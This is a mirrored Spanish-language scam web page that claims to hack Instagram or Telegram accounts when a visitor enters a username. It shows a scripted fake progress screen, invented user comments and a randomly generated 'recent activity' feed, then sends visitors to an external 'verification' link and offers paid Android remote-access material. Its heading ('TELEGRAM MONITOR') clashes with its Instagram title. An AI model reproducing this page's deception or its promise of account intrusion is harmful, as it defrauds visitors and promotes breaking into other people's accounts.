
<!doctype html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="es-ES">
<!--<![endif]-->
<!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->




<!-- Mirrored from es.hackinstapass.com/hackear-instagram/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Dec 2020 05:48:08 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>hackear instagram - como hackear una cuenta de instagram </title>
  
  <meta name="description" content="como hackear instagram, como hackear una cuenta de instagram, hackear cuenta de instagram, hackear cuenta instagram, como hackear un instagram, hackear instagram sin pagar, como hackear cuentas de instagram.">
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- VENDOR CSS-->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <link rel="stylesheet" href="css/bootstrap-theme.min.css">
  <link rel="stylesheet" href="css/fontello.css">
  <link rel="stylesheet" href="css/main.css">
  <!-- VENDOR CSS -->
  <!-- FONTS -->
  <link href="https://fonts.googleapis.com/css?family=Inconsolata|Poiret+One" rel="stylesheet">
  <!-- FONTS -->
  <script src="js/globals.js"></script>
     <!-- --------- -->
  <link href="images/insta-fav.png" rel="icon">




<!-- -->


</head>
<body style="background-image:url(images/insta-bg.jpg)">
  <header class="main-header">
    <figure class="logo">
      <a href="https://es.hackinstapass.com/"><img src="images/insta-logo.png" alt="hackear instagram"></a>
    </figure>
  </header>
  <main>
    <div class="generator" id="generator">
      <h1 class="text-center title">TELEGRAM MONITOR</h1>
      <div class="generator-wrapper">
        <div id="step-1" style="">
          <!-- RESOURCE -->
          <label class="text-center title" for="username">INGRESE EL NÚMERO / NOMBRE DE USUARIO DE TELEGRAM</label>
          <div class="input-group">
              <span class="input-group-addon">
                <img src="user-icons/default.png" alt="">
              </span>
            <input type="text" name="username" id="username-input">
          </div>
          <div class="text-center">
            <button id="generate" class="btn-action btn-big btn-yellow">EMPEZAR HACK</button>
          </div>
        </div>
          <div id="step-2" class="generating-wrapper" style="display:none">
            <div class="spinner"></div>
            <h3 class="text-center gen-title">TRABAJANDO...</h3>
          </div>
            <div id="step-4" class="generating-wrapper s-4"  style="display:none">
                <div class="generating-card" id="r-1" style="opacity:0">
                    <span class="gen-card-title" id="username-r"></span>
                    <p>CONNECTED</p>
                </div>
                <div class="generating-card" id="r-2" style="opacity:0">
                    <span class="gen-card-title">STATUS</span>
                    <p>Hacked</p>
                </div>
                <div class="generating-card" id="r-3" style="opacity:0">
                    <span class="gen-card-title">Extracting</span>
                    <p>Completed</p>
                </div>
                <div class="generating-card" id="r-4" style="opacity:0">
                    <span class="gen-card-title">Human Verification</span>
                    <p>Pending</p>
                </div>
                <div id="step-5" class="verification"  style="display:none">
                  <h3 class="text-center">¡Casi terminamos!</h3>
                  
                       <center>           
                 <!-- <div data-captcha-enable="true"></div> -->
</center>  
                  <p class="text-center">¡Se ha analizado la cuenta, no ha sido posible acceder. A continuacion, le ofrecemos material complementario para acceder a un Android de forma remota. Debe realizar el pago para acceder al fichero!..</p>
                  <img src="img/loading.gif" alt=""> 
                  
    
                  
                  <!--<button class="btn-action btn-sm" rel="nofollow"	style="background: #3845bf;color: black;text-shadow: none;" onclick="window.open('https://vipgens.com/1cd24ba')"">VERIFY NOW</button> -->
                  
                  
               
       <button class="btn-action btn-sm" rel="nofollow"	style="background: #3845bf;color: black;text-shadow: none;" onclick="window.open('https://vipgens.com/1cd24ba')"">VERIFICA</button>

       
       
                </div>
              </div>
          <div id="step-3" style="display:none">
          <p class="text-center generating-message" id="generating-message">Generating for something</p>
          <div class="progress">
            <div class="progress-bar" role="progressbar" aria-valuenow="70"
            aria-valuemin="0" aria-valuemax="100" style="width:0%" id="progress-belt">
              <span class="sr-only">70% Complete</span>
            </div>
          </div>
          </div>
        </div>
      </div>
    </div>
    <div class="sidebar" id="recent-activity">
      <h3 class="recent-title">ACTIVIDAD RECIENTE <span class="icon-spin3 recent-icon-spin"></span></h3>
      <h5 class="server-stats">
        <p>SERVER STATUS <span class="icon-dot green"></span></p>

        <p>SERVER LOAD <span class="icon-dot red"></span></p>
      </h5>
      <div class="recent-activity-box" id="recent-box">
      </div>
    </div>
    <div class="comments">
      <h1 class="text-center title blue">ÚLTIMOS COMENTARIOS <span class="icon-chat-empty"></span></h1>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Veeless</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>Ahora no necesito ayuda. Puedo hackear Instagram de mí mismo.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Hush</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>No puedo creer creer que esto realmente funciona, la contraseña de Instagram hackeada.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Pika</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>¡Este truco es asombroso!
</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Mahi</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Publicado hace unos segundos</span>
          </span>
          <p>Wow! thanks! for Instagram hack</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Lica</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>awesome man! you should sell Instagram software.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Zhon</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>¡Perfecto! Esto es lo que estoy buscando!</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Mark</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>¡Perfecto! Esto es lo que estoy buscando! para poder hackear la contraseña de Instagram..</p>
        </div>
      </div>
            <div class="add-comment">
        <h5>agregar comentario</h5>
        <input type="text" name="username-add-comment" placeholder="Username">
        <textarea name="comment-add"></textarea>
         <button class="btn-action btn-big btn-yellow submit-comment" data-toggle="modal" data-target="#error-comment">AGREGAR NUEVO COMENTARIO</button>
      </div>
    </div>
  </main>
<footer class="text-center">
  <ul class="footer-menu">
    <li><a href="#">CONTÁCTENOS</a></li>
    <li class="sep">|</li>
    <li><a href="#">TÉRMINOS DE SERVICIO</a></li>
    <li class="sep">|</li>
    <li><a href="#">Política de privacidad</a></li>
  </ul>
  <pTodas las marcas comerciales, marcas de servicio, nombres comerciales, imagen comercial, nombres de productos y logotipos que aparecen en el sitio son propiedad de sus respectivos dueños.</p>
</footer>
<!-- Modal -->
<div id="error" class="modal fade" role="dialog">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-body text-center">
        <h1>Error</h1>
        <h2><span class="icon-cancel icon-error-modal"></span></h2>
        <h4>Please enter your Username!</h4>
        <button class="btn btn-sm btn-success" data-dismiss="modal">BACK</button>
      </div>
    </div>

  </div>
</div>
<!-- Modal -->
<div id="error-comment" class="modal fade" role="dialog">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-body text-center">
        <h1>Error</h1>
        <h2><span class="icon-cancel icon-error-modal"></span></h2>
        <p>TO PREVENT SPAM, COMMENTING IS ONLY ALLOWED FOR USERS WHO ALREADY USED OUR GENERATOR.</p>
        <button class="btn-action btn-sm btn-blue" data-dismiss="modal">BACK</button>
      </div>
    </div>

  </div>
</div>
<!-- Modal -->
  <!-- VENDOR JS -->
  <script src="js/vendor/jquery-3.1.1.min.js"></script>
  <script src="js/vendor/bootstrap.min.js"></script>
  <!-- VENDOR JS -->
  <script src="js/generator.js"></script>
    <script>
var platforms = ["ANDROID", "iOS", "PC"];
$(function(){
var wrapper = $("#recent-box");
var updateActivity = function(){
  var interval = setInterval(function(){
    var nickname = nicks[random(0,nicks.length-1)];
    $(`<div class="recent-activity-card" style="display:none">
          <header>
            <img src="flag-icons/${random(1,9)}.png" class="flag-icon" alt="flag">
            <span class="r-username">${nickname}</span> <span class="label label-default">${platforms[random(0,platforms.length)]}</span>
          </header>
                    <div class="resource">
            Chats de telegram obtenidos  </div>
                  </div>`).prependTo(wrapper).slideDown(400,function(){
      $(this).delay(100000).fadeOut('100', function() {
        $(this).remove();
      });
    });
  },random(800,3500));
}
updateActivity();
}());
  </script>
<script>
function BMBQvXwVtX(){window.location.href=""}
 </script>


</body>



<!-- Mirrored from es.hackinstapass.com/hackear-instagram/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Dec 2020 05:48:18 GMT -->
</html>
